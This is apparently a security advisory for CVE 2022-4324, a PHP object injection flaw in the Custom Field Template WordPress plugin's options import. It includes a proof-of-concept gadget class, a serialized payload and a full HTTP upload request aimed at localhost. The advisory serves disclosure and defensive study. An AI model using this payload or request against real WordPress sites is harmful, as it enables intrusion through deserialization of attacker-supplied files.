Custom Field Template < 2.5.8 – Admin+ PHP Object Injection | CVE 2022-4324

Description

The plugin unserialises the content of an imported file, which could lead to PHP object injections issues when a high privilege user import (intentionally or not) a malicious Customizer Styling file and a suitable gadget chain is present on the blog.

Proof of Concept

To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Create a file named "import" with the following content: O:4:"Evil":0:{};

Import the file via the "Import Options" feature in Settings > Custom Field Template (requires the Custom Field Template plugin to be active)

The view the response of the import request made, which will have the "Arbitrary deserialization" message.

POST /wp-admin/options-general.php?page=custom-field-template.php HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8888/wp-admin/options-general.php?page=custom-field-template.php
Content-Type: multipart/form-data; boundary=---------------------------320398356634323216632938480962
Content-Length: 418
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------320398356634323216632938480962
Content-Disposition: form-data; name="cftfile"; filename="import"
Content-Type: application/octet-stream

O:4:"Evil":0:{};

-----------------------------320398356634323216632938480962
Content-Disposition: form-data; name="custom_field_template_import_options_submit"

Import Options »
-----------------------------320398356634323216632938480962--